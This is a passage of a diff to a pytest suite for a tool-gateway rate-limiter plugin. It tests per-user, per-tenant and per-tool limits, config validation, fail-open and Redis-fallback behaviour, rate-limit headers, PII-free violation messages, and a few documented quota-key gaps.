hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "100/s", "by_tenant": "2/s"}, - ) - ) - - ctx_alice = PluginContext(global_context=GlobalContext(request_id="r1", user="alice", tenant_id=None)) - ctx_bob = PluginContext(global_context=GlobalContext(request_id="r2", user="bob", tenant_id=None)) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - r1 = await plugin.tool_pre_invoke(payload, ctx_alice) - r2 = await plugin.tool_pre_invoke(payload, ctx_bob) - r3 = await plugin.tool_pre_invoke(payload, ctx_alice) # by_tenant skipped — must not block - - assert r1.violation is None - assert r2.violation is None - assert r3.violation is None # by_tenant is skipped when tenant_id is None - - -@pytest.mark.asyncio -async def test_unicode_user_id_is_rate_limited_correctly(): - """ - Unicode user identities (non-ASCII email, CJK, emoji) are valid dict keys. - Rate limiting works correctly for unicode identities. - """ - plugin = _mk("2/s") - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - for user in ["用户@example.com", "ユーザー@test.jp", "مستخدم@example.com", "user🎉@example.com"]: - _clear_plugin(plugin) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user=user)) - - r1 = await plugin.tool_pre_invoke(payload, ctx) - r2 = await plugin.tool_pre_invoke(payload, ctx) - r3 = await plugin.tool_pre_invoke(payload, ctx) - - assert r1.violation is None, f"First request failed for user: {user}" - assert r2.violation is None, f"Second request failed for user: {user}" - assert r3.violation is not None, f"Third request not blocked for user: {user}" - - -@pytest.mark.asyncio -async def test_very_large_user_pool_all_share_separate_buckets(): - """ - 1000 distinct users each get their own independent bucket. - No user should be affected by another user's requests. - """ - plugin = _mk("1/s") - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - for i in range(1000): - ctx = PluginContext(global_context=GlobalContext(request_id=f"r{i}", user=f"user_{i}@example.com")) - result = await plugin.tool_pre_invoke(payload, ctx) - assert result.violation is None, f"user_{i} should not be blocked by other users" - - -def test_malformed_rate_count_raises_at_init(): - """ - A non-numeric count in the rate string (e.g. 'abc/m') now raises ValueError - at plugin initialisation, not silently at request time. - - _validate_config() parses all rate strings in __init__ and raises immediately, - giving a clear error at startup rather than a confusing failure mid-request. - """ - with pytest.raises(ValueError, match="RateLimiterPlugin config errors"): - RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "abc/m"}, # invalid count - ) - ) - - -def test_unsupported_rate_unit_raises_at_init(): - """ - An unsupported time unit (e.g. '60/d' for days) now raises ValueError - at plugin initialisation via _validate_config(). - - This ensures operators discover misconfigured rate strings at startup - rather than when the first request hits the bad code path. - """ - with pytest.raises(ValueError, match="RateLimiterPlugin config errors"): - RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "60/d"}, # unsupported unit - ) - ) + result = await plugin.prompt_pre_fetch(payload, ctx) + assert result.violation is None + assert result.http_headers["X-RateLimit-Limit"] == "10" + assert result.http_headers["X-RateLimit-Remaining"] == "9" + assert "Retry-After" not in result.http_headers + assert int(result.http_headers["X-RateLimit-Reset"]) > 0 + + @pytest.mark.asyncio + async def test_tool_pre_invoke_applies_per_tool_limit(self): + plugin = make_plugin({"by_user": "100/s", "by_tool": {"restricted_tool": "1/s"}}) + ctx = make_context(request_id="r2") + restricted_payload = ToolPreInvokePayload(name="restricted_tool", arguments={}) + unrestricted_payload = ToolPreInvokePayload(name="other_tool", arguments={}) + + first = await plugin.tool_pre_invoke(restricted_payload, ctx) + second = await plugin.tool_pre_invoke(restricted_payload, ctx) + third = await plugin.tool_pre_invoke(unrestricted_payload, ctx) + + assert first.violation is None + assert second.violation is not None + assert second.violation.http_status_code == 429 + assert third.violation is None + + @pytest.mark.asyncio + async def test_tool_pre_invoke_applies_tenant_limit_when_present(self): + plugin = make_plugin({"by_user": "100/s", "by_tenant": "1/s"}) + payload = ToolPreInvokePayload(name="search", arguments={}) + + tenant_a = make_context(request_id="r3", user="u1", tenant_id="tenant-a") + tenant_b = make_context(request_id="r4", user="u1", tenant_id="tenant-b") + + first = await plugin.tool_pre_invoke(payload, tenant_a) + second = await plugin.tool_pre_invoke(payload, tenant_a) + third = await plugin.tool_pre_invoke(payload, tenant_b) + + assert first.violation is None + assert second.violation is not None + assert third.violation is None + + @pytest.mark.asyncio + async def test_tool_pre_invoke_skips_tenant_dimension_when_missing(self): + plugin = make_plugin({"by_user": "100/s", "by_tenant": "1/s"}) + payload = ToolPreInvokePayload(name="search", arguments={}) + ctx = make_context(request_id="r5", tenant_id=None) -def test_invalid_backend_raises_at_init(): - """ - An unrecognised backend (e.g. typo 'reddis') raises ValueError at startup - via _validate_config() rather than silently falling back to memory. - """ - with pytest.raises(ValueError, match="RateLimiterPlugin config errors"): - RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "10/s", "backend": "reddis"}, - ) - ) + first = await plugin.tool_pre_invoke(payload, ctx) + second = await plugin.tool_pre_invoke(payload, ctx) + assert first.violation is None + assert second.violation is None -def test_malformed_by_tool_rate_raises_at_init(): - """ - A malformed rate string inside by_tool (e.g. 'abc/m') raises ValueError - at plugin initialisation listing the invalid tool entry. - """ - with pytest.raises(ValueError, match="by_tool"): - RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_tool": {"search": "abc/m"}}, - ) - ) + @pytest.mark.asyncio + async def test_prompt_pre_fetch_uses_packaged_core(self): + plugin = make_plugin({"by_user": "5/s"}) + payload = PromptPrehookPayload(prompt_id="p", args={}) + ctx = make_context(request_id="r6") + plugin._core = SimpleNamespace(prompt_pre_fetch=AsyncMock(return_value="sentinel")) + result = await plugin.prompt_pre_fetch(payload, ctx) -@pytest.mark.asyncio -async def test_graceful_degradation_tool_pre_invoke_does_not_crash_caller(): - """ - If an unexpected runtime error occurs inside tool_pre_invoke (e.g. a bug in the backend), - the exception is caught, logged, and a permissive result is returned. + plugin._core.prompt_pre_fetch.assert_awaited_once_with(payload, ctx) + assert result == "sentinel" - The gateway request is NOT crashed by a plugin error. - This is tested by patching the backend's allow method to raise a RuntimeError. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "10/s"}, - ) - ) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) + @pytest.mark.asyncio + async def test_tool_pre_invoke_uses_packaged_core(self): + plugin = make_plugin({"by_user": "5/s"}) + payload = ToolPreInvokePayload(name="search", arguments={}) + ctx = make_context(request_id="r7") + plugin._core = SimpleNamespace(tool_pre_invoke=AsyncMock(return_value="sentinel")) - with patch.object(plugin._rate_backend, "allow", side_effect=RuntimeError("simulated internal error")): result = await plugin.tool_pre_invoke(payload, ctx) - assert result is not None, "Plugin should return a result even when backend.allow() raises unexpectedly" - assert result.violation is None, "Permissive degradation: unexpected errors allow the request through" - + plugin._core.tool_pre_invoke.assert_awaited_once_with(payload, ctx) + assert result == "sentinel" -@pytest.mark.asyncio -async def test_graceful_degradation_prompt_pre_fetch_does_not_crash_caller(): - """ - If an unexpected runtime error occurs inside prompt_pre_fetch, the exception - is caught, logged, and a permissive result is returned. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[PromptHookType.PROMPT_PRE_FETCH], - config={"by_user": "10/s"}, - ) - ) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = PromptPrehookPayload(prompt_id="my_prompt", args={}) + @pytest.mark.asyncio + async def test_prompt_pre_fetch_fails_open_when_core_raises(self): + plugin = make_plugin({"by_user": "5/s"}) + payload = PromptPrehookPayload(prompt_id="p", args={}) + ctx = make_context(request_id="r8") + plugin._core = SimpleNamespace(prompt_pre_fetch=AsyncMock(side_effect=RuntimeError("boom"))) - with patch.object(plugin._rate_backend, "allow", side_effect=RuntimeError("simulated internal error")): result = await plugin.prompt_pre_fetch(payload, ctx) - assert result is not None, "Plugin should return a result even when backend.allow() raises unexpectedly" - assert result.violation is None, "Permissive degradation: unexpected errors allow the request through" - - -# ============================================================================ -# Permissive Mode Tests -# -# mode=permissive is handled by the plugin manager (PluginExecutor), not by -# the plugin itself. When a plugin returns a violation in permissive mode the -# manager logs it but does NOT raise PluginViolationError — the request -# continues. These tests go through PluginExecutor to exercise that path. -# ============================================================================ - - -@pytest.mark.asyncio -async def test_permissive_mode_allows_request_past_limit(): - """ - In permissive mode, exceeding the rate limit logs a warning but does NOT - block the request. PluginExecutor must NOT raise PluginViolationError even - with violations_as_exceptions=True. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "1/s"}, - mode=PluginMode.PERMISSIVE, - ) - ) - plugin_ref = PluginRef(plugin) - hook_ref = HookRef("tool_pre_invoke", plugin_ref) - executor = PluginExecutor(timeout=5) - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # First call: allowed - await executor.execute_plugin(hook_ref, payload, ctx, violations_as_exceptions=True) + assert result.continue_processing is True + assert result.violation is None - # Second call: exceeds limit — permissive mode must NOT raise - try: - result = await executor.execute_plugin(hook_ref, payload, ctx, violations_as_exceptions=True) - except PluginViolationError: - pytest.fail("PluginViolationError raised in permissive mode — should be suppressed") + @pytest.mark.asyncio + async def test_tool_pre_invoke_fails_open_when_core_raises(self): + plugin = make_plugin({"by_user": "5/s"}) + payload = ToolPreInvokePayload(name="search", arguments={}) + ctx = make_context(request_id="r9") + plugin._core = SimpleNamespace(tool_pre_invoke=AsyncMock(side_effect=RuntimeError("boom"))) - # The violation is still surfaced in the result (for observability), just not raised - assert result.violation is not None, "Violation info should still be present for logging/metrics" - assert result.violation.http_status_code == 429 - - -@pytest.mark.asyncio -async def test_enforce_mode_raises_on_limit_exceeded(): - """ - Contrast: in enforce mode, exceeding the limit with violations_as_exceptions=True - DOES raise PluginViolationError. This test ensures the distinction is clear. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "1/s"}, - mode=PluginMode.ENFORCE, - ) - ) - plugin_ref = PluginRef(plugin) - hook_ref = HookRef("tool_pre_invoke", plugin_ref) - executor = PluginExecutor(timeout=5) - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # First call: allowed - await executor.execute_plugin(hook_ref, payload, ctx, violations_as_exceptions=True) - - # Second call: enforce mode must raise - with pytest.raises(PluginViolationError): - await executor.execute_plugin(hook_ref, payload, ctx, violations_as_exceptions=True) - - -# ============================================================================ -# Redis Fallback Tests -# -# When backend='redis' and redis_fallback=True, a Redis connection failure -# falls back to the in-process MemoryBackend. The rate limiter must continue -# to function correctly without crashing the caller. -# ============================================================================ - - -@pytest.mark.asyncio -async def test_redis_fallback_to_memory_when_redis_unavailable(): - """ - When the Redis client raises an exception (simulating Redis being down), - and redis_fallback=True, the plugin falls back to MemoryBackend and the - request succeeds rather than erroring. - - Forces _RUST_AVAILABLE=False so the Python RedisBackend path is exercised — - the Rust engine owns its own Redis connection and is not affected by - injecting a broken client into _rate_backend._client. - """ - - class _BrokenRedis: - """Simulates a Redis client that always fails.""" + result = await plugin.tool_pre_invoke(payload, ctx) - async def eval(self, *args: Any, **kwargs: Any) -> None: - raise ConnectionError("Redis is down") - - # First-Party - import plugins.rate_limiter.rate_limiter as _rl_mod - - with patch.object(_rl_mod, "_RUST_AVAILABLE", False): - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "10/s", "backend": "redis", "redis_url": "redis://localhost:6379/0", "redis_fallback": True}, - ) - ) - plugin._rate_backend._client = _BrokenRedis() - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - result = await plugin.tool_pre_invoke(payload, ctx) - assert result.violation is None, "Request should succeed via memory fallback when Redis is down" - - -@pytest.mark.asyncio -async def test_redis_fallback_enforces_limit_via_memory(): - """ - After falling back to memory, the MemoryBackend still enforces the rate - limit correctly — the fallback is not a free pass. - - Forces _RUST_AVAILABLE=False so the Python RedisBackend path is exercised — - the Rust engine owns its own Redis connection and is not affected by - injecting a broken client into _rate_backend._client. - """ - - class _BrokenRedis: - async def eval(self, *args: Any, **kwargs: Any) -> None: - raise ConnectionError("Redis is down") - - # First-Party - import plugins.rate_limiter.rate_limiter as _rl_mod - - with patch.object(_rl_mod, "_RUST_AVAILABLE", False): - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "2/s", "backend": "redis", "redis_url": "redis://localhost:6379/0", "redis_fallback": True}, - ) - ) - plugin._rate_backend._client = _BrokenRedis() - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - r1 = await plugin.tool_pre_invoke(payload, ctx) - r2 = await plugin.tool_pre_invoke(payload, ctx) - r3 = await plugin.tool_pre_invoke(payload, ctx) - - assert r1.violation is None - assert r2.violation is None - assert r3.violation is not None, "Memory fallback must still enforce the configured limit" - assert r3.violation.http_status_code == 429 - - -@pytest.mark.asyncio -async def test_redis_no_fallback_raises_on_redis_failure(): - """ - When redis_fallback=False and Redis is unavailable, the plugin's internal - error handling catches the exception and allows the request through - (graceful degradation), rather than crashing the caller. - """ - - class _BrokenRedis: - async def eval(self, *args: Any, **kwargs: Any) -> None: - raise ConnectionError("Redis is down") - - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "10/s", "backend": "redis", "redis_url": "redis://localhost:6379/0", "redis_fallback": False}, - ) - ) - plugin._rate_backend._client = _BrokenRedis() - plugin._rate_backend._fallback = None # disable fallback explicitly - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # Should not crash the caller — graceful degradation allows through - result = await plugin.tool_pre_invoke(payload, ctx) - assert result is not None, "Plugin must not propagate Redis failure to the caller" - - -# ============================================================================ -# Cross-Tenant Isolation Tests -# -# Each tenant gets its own independent counter. Exhausting one tenant's limit -# must not block requests from a different tenant. -# ============================================================================ - - -@pytest.mark.asyncio -async def test_cross_tenant_isolation_different_tenants_independent(): - """ - Exhausting tenant A's limit does not block tenant B. - Each tenant has a completely separate counter. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_tenant": "2/s"}, - ) - ) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - ctx_a = PluginContext(global_context=GlobalContext(request_id="r1", user="user1", tenant_id="tenant-A")) - ctx_b = PluginContext(global_context=GlobalContext(request_id="r2", user="user2", tenant_id="tenant-B")) - - # Exhaust tenant-A's limit - await plugin.tool_pre_invoke(payload, ctx_a) - await plugin.tool_pre_invoke(payload, ctx_a) - blocked = await plugin.tool_pre_invoke(payload, ctx_a) - assert blocked.violation is not None, "tenant-A should be rate limited" - - # tenant-B should be completely unaffected - r = await plugin.tool_pre_invoke(payload, ctx_b) - assert r.violation is None, "tenant-B should not be blocked by tenant-A's exhausted counter" - - -@pytest.mark.asyncio -async def test_cross_tenant_no_counter_bleed(): - """ - Many requests from tenant-A do not increment tenant-B's counter. - tenant-B's remaining count should still be at its maximum. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_tenant": "100/s"}, - ) - ) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - ctx_a = PluginContext(global_context=GlobalContext(request_id="r1", user="u1", tenant_id="tenant-A")) - ctx_b = PluginContext(global_context=GlobalContext(request_id="r2", user="u2", tenant_id="tenant-B")) - - # tenant-A sends 50 requests - for _ in range(50): - await plugin.tool_pre_invoke(payload, ctx_a) - - # tenant-B's first request should show remaining=99 (untouched) - result = await plugin.tool_pre_invoke(payload, ctx_b) - assert result.violation is None - assert result.http_headers is not None - assert result.http_headers["X-RateLimit-Remaining"] == "99", ( - f"tenant-B remaining should be 99 (limit=100, only 1 request so far), " - f"got {result.http_headers['X-RateLimit-Remaining']} — " - f"tenant-A's 50 requests must not have incremented tenant-B's counter" - ) - - -# ============================================================================ -# Header Accuracy Tests -# -# Verify the mathematical correctness of Retry-After and X-RateLimit-Reset, -# not just their presence. -# ============================================================================ - - -@pytest.mark.asyncio -async def test_retry_after_is_within_window_duration(): - """ - Retry-After must be <= the configured window duration. - For a 1-second window it must be in [1, 1]. - For a 60-second window it must be in [1, 60]. - """ - plugin = _mk("1/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - await plugin.tool_pre_invoke(payload, ctx) # consume limit - result = await plugin.tool_pre_invoke(payload, ctx) # trigger violation - - assert result.violation is not None - retry_after = int(result.violation.http_headers["Retry-After"]) - assert 1 <= retry_after <= 1, f"For a 1/s limit, Retry-After should be 1 second, got {retry_after}" - - -@pytest.mark.asyncio -async def test_retry_after_for_minute_window_is_bounded(): - """ - For a 1/m limit, Retry-After must be between 1 and 60 seconds. - It must not exceed the window size. - """ - plugin = _mk("1/m") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - await plugin.tool_pre_invoke(payload, ctx) # consume limit - result = await plugin.tool_pre_invoke(payload, ctx) # trigger violation - - assert result.violation is not None - retry_after = int(result.violation.http_headers["Retry-After"]) - assert 1 <= retry_after <= 60, f"For a 1/m limit, Retry-After should be 1–60 seconds, got {retry_after}" - - -@pytest.mark.asyncio -async def test_x_ratelimit_reset_is_in_the_future(): - """ - X-RateLimit-Reset must be a Unix timestamp strictly greater than now. - """ - plugin = _mk("10/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - before = int(time.time()) - result = await plugin.tool_pre_invoke(payload, ctx) - after = int(time.time()) + 2 # small buffer for slow machines - - assert result.violation is None - reset = int(result.http_headers["X-RateLimit-Reset"]) - assert reset >= before, f"X-RateLimit-Reset ({reset}) should be >= now ({before})" - assert reset <= after + 1, f"X-RateLimit-Reset ({reset}) should be within 1s window of now" - - -@pytest.mark.asyncio -async def test_x_ratelimit_reset_consistent_within_window(): - """ - Multiple requests in the same window must return the same X-RateLimit-Reset - timestamp. The reset timestamp is fixed at window-start + window-duration and - must not shift between requests. - """ - plugin = _mk("10/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - r1 = await plugin.tool_pre_invoke(payload, ctx) - r2 = await plugin.tool_pre_invoke(payload, ctx) - r3 = await plugin.tool_pre_invoke(payload, ctx) - - reset1 = r1.http_headers["X-RateLimit-Reset"] - reset2 = r2.http_headers["X-RateLimit-Reset"] - reset3 = r3.http_headers["X-RateLimit-Reset"] - - assert reset1 == reset2 == reset3, f"X-RateLimit-Reset must be identical across all requests in the same window. " f"Got {reset1}, {reset2}, {reset3}" - - -@pytest.mark.asyncio -async def test_x_ratelimit_remaining_decrements_correctly(): - """ - X-RateLimit-Remaining must decrement by exactly 1 per request - until it reaches 0 at the limit boundary. - """ - plugin = _mk("5/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - results = [] - for _ in range(5): - r = await plugin.tool_pre_invoke(payload, ctx) - assert r.violation is None - results.append(int(r.http_headers["X-RateLimit-Remaining"])) - - assert results == [4, 3, 2, 1, 0], f"X-RateLimit-Remaining should count down 4→3→2→1→0, got {results}" - - -# ============================================================================ -# Bypass Resistance Tests -# -# These tests document how the rate limiter handles identity edge cases. -# Tests that pass confirm correct/intentional behaviour. -# Tests marked xfail document known gaps where a caller could sidestep limits. -# ============================================================================ - - -@pytest.mark.asyncio -async def test_bypass_none_user_falls_back_to_anonymous_bucket(): - """ - None user identity resolves to 'anonymous' — same bucket as an empty string. - A caller cannot gain a fresh bucket by sending None as their user identity. - """ - plugin = _mk("2/s") - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # None user → "anonymous" bucket - ctx_none = PluginContext(global_context=GlobalContext(request_id="r1", user=None)) - # empty string user → also "anonymous" bucket (via `or "anonymous"`) - ctx_empty = PluginContext(global_context=GlobalContext(request_id="r2", user="")) - - r1 = await plugin.tool_pre_invoke(payload, ctx_none) - r2 = await plugin.tool_pre_invoke(payload, ctx_empty) - r3 = await plugin.tool_pre_invoke(payload, ctx_none) # same "anonymous" bucket — exhausted - - assert r1.violation is None - assert r2.violation is None - assert r3.violation is not None, "None and empty-string users share the 'anonymous' bucket — " "a third request must be blocked regardless of which falsy identity sent it" - - -@pytest.mark.asyncio -async def test_bypass_whitespace_user_shares_anonymous_bucket(): - """ - A whitespace-only user identity (' ') should be treated the same as an - empty string and fall back to the 'anonymous' bucket. - - Current behaviour: ' ' is truthy, so `user or 'anonymous'` keeps it as-is, - creating an independent 'user: ' bucket. This is a bypass vector. - """ - plugin = _mk("2/s") - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - ctx_anon = PluginContext(global_context=GlobalContext(request_id="r1", user="")) - ctx_ws = PluginContext(global_context=GlobalContext(request_id="r2", user=" ")) - - # Exhaust the anonymous bucket - await plugin.tool_pre_invoke(payload, ctx_anon) - await plugin.tool_pre_invoke(payload, ctx_anon) - - # Whitespace user should be in the same bucket → blocked - r = await plugin.tool_pre_invoke(payload, ctx_ws) - assert r.violation is not None, "Whitespace-only user identity should share the 'anonymous' bucket. " "Currently it creates its own bucket, bypassing the anonymous limit." - - -@pytest.mark.asyncio -async def test_bypass_tool_name_case_sensitivity(): - """ - A per-tool limit on 'search' should also apply to 'Search' and 'SEARCH'. - - Current behaviour: by_tool lookup is an exact dict key match — 'Search' does - not hit the 'search' limit and gets an unlimited quota. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "100/s", "by_tool": {"search": "1/s"}}, - ) - ) - payload_lower = ToolPreInvokePayload(name="search", arguments={}) - payload_upper = ToolPreInvokePayload(name="Search", arguments={}) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - - # Exhaust the per-tool limit using the lowercase name - await plugin.tool_pre_invoke(payload_lower, ctx) - - # Calling with different casing should still be caught by the same limit - r = await plugin.tool_pre_invoke(payload_upper, ctx) - assert r.violation is not None, "'Search' should be subject to the same 1/s limit as 'search'. " "Case-insensitive matching is not implemented — this is a bypass vector." - - -@pytest.mark.asyncio -async def test_bypass_tool_name_whitespace(): - """ - A per-tool limit on 'search' should also apply to ' search' (leading space). - - Current behaviour: ' search' != 'search' in the dict lookup, so the per-tool - limit is not applied and the request is treated as having no tool-level limit. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "100/s", "by_tool": {"search": "1/s"}}, - ) - ) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - - # Exhaust the limit using the canonical name - await plugin.tool_pre_invoke(ToolPreInvokePayload(name="search", arguments={}), ctx) - - # Whitespace variant should be caught by the same limit - r = await plugin.tool_pre_invoke(ToolPreInvokePayload(name=" search", arguments={}), ctx) - assert r.violation is not None, "' search' (leading space) should be subject to the same limit as 'search'. " "Whitespace stripping is not implemented — this is a bypass vector." - - -@pytest.mark.asyncio -async def test_bypass_anonymous_exhaustion_does_not_affect_real_users(): - """ - Exhausting the anonymous bucket must not block authenticated users. - Each real user has their own independent bucket. - """ - plugin = _mk("2/s") - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - ctx_anon = PluginContext(global_context=GlobalContext(request_id="r1", user="")) - ctx_alice = PluginContext(global_context=GlobalContext(request_id="r2", user="alice@example.com")) - - # Exhaust the anonymous bucket - await plugin.tool_pre_invoke(payload, ctx_anon) - await plugin.tool_pre_invoke(payload, ctx_anon) - blocked_anon = await plugin.tool_pre_invoke(payload, ctx_anon) - assert blocked_anon.violation is not None - - # Alice is a real user — her bucket is untouched - r = await plugin.tool_pre_invoke(payload, ctx_alice) - assert r.violation is None, "Exhausting the anonymous bucket must not affect real authenticated users" - - -# ============================================================================ -# Logging / PII Tests -# -# Violation descriptions must not contain user or tenant identifiers. -# These strings are included in log output (permissive mode) and in -# PluginViolationError messages (enforce mode) — leaking them would expose -# PII in structured logs and error traces. -# ============================================================================ - - -@pytest.mark.asyncio -async def test_violation_description_does_not_contain_user_identity(): - """Violation description must not include the user's identity string.""" - plugin = _mk("1/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice@example.com")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - await plugin.tool_pre_invoke(payload, ctx) # consume limit - result = await plugin.tool_pre_invoke(payload, ctx) # trigger violation - - assert result.violation is not None - assert "alice@example.com" not in result.violation.description, ( - "User identity must not appear in the violation description — " "it is logged in permissive mode and embedded in PluginViolationError messages" - ) - - -@pytest.mark.asyncio -async def test_violation_description_does_not_contain_tenant_identity(): - """Violation description must not include the tenant identifier.""" - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_tenant": "1/s"}, - ) - ) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice", tenant_id="acme-corp")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - await plugin.tool_pre_invoke(payload, ctx) - result = await plugin.tool_pre_invoke(payload, ctx) - - assert result.violation is not None - assert "acme-corp" not in result.violation.description, "Tenant identifier must not appear in the violation description" - - -@pytest.mark.asyncio -async def test_prompt_violation_description_does_not_contain_user_identity(): - """Same check for prompt_pre_fetch — description must not include user identity.""" - plugin = _mk("1/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="bob@example.com")) - payload = PromptPrehookPayload(prompt_id="my_prompt", args={}) - - await plugin.prompt_pre_fetch(payload, ctx) - result = await plugin.prompt_pre_fetch(payload, ctx) - - assert result.violation is not None - assert "bob@example.com" not in result.violation.description, "User identity must not appear in the prompt violation description" - - -@pytest.mark.asyncio -async def test_bypass_different_tenants_are_intentionally_independent(): - """ - Users in different tenants have separate tenant counters — this is intentional. - A user who belongs to two tenants effectively gets two independent tenant quotas. - This test documents the behaviour as intentional (not a bug) so reviewers have - explicit confirmation that multi-tenant quota isolation is by design. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "100/s", "by_tenant": "2/s"}, - ) - ) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - ctx_t1 = PluginContext(global_context=GlobalContext(request_id="r1", user="alice", tenant_id="tenant-1")) - ctx_t2 = PluginContext(global_context=GlobalContext(request_id="r2", user="alice", tenant_id="tenant-2")) - - # Exhaust tenant-1 limit - await plugin.tool_pre_invoke(payload, ctx_t1) - await plugin.tool_pre_invoke(payload, ctx_t1) - blocked = await plugin.tool_pre_invoke(payload, ctx_t1) - assert blocked.violation is not None, "tenant-1 should be exhausted" - - # Same user in tenant-2 is allowed — separate counter, by design - r = await plugin.tool_pre_invoke(payload, ctx_t2) - assert r.violation is None, ( - "tenant-2 has a separate independent counter — this is intentional. " "Tenant identity comes from the JWT and is controlled by the auth layer, " "not bypassable by request content." - ) - - -# ============================================================================ -# Algorithm Strategy Tests -# -# Tests that are specific to each algorithm: sliding_window and token_bucket. -# fixed_window behaviour is already covered by all existing tests above. -# ============================================================================ - - -# --------------------------------------------------------------------------- -# Algorithm selection and validation -# --------------------------------------------------------------------------- - - -def test_invalid_algorithm_raises_at_init(): - """An unrecognised algorithm name must raise ValueError at startup.""" - with pytest.raises(ValueError, match="RateLimiterPlugin config errors"): - RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "10/s", "algorithm": "leaky_bucket"}, - ) - ) - - -def test_default_algorithm_is_fixed_window(): - """When algorithm is not specified, fixed_window is used.""" - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - 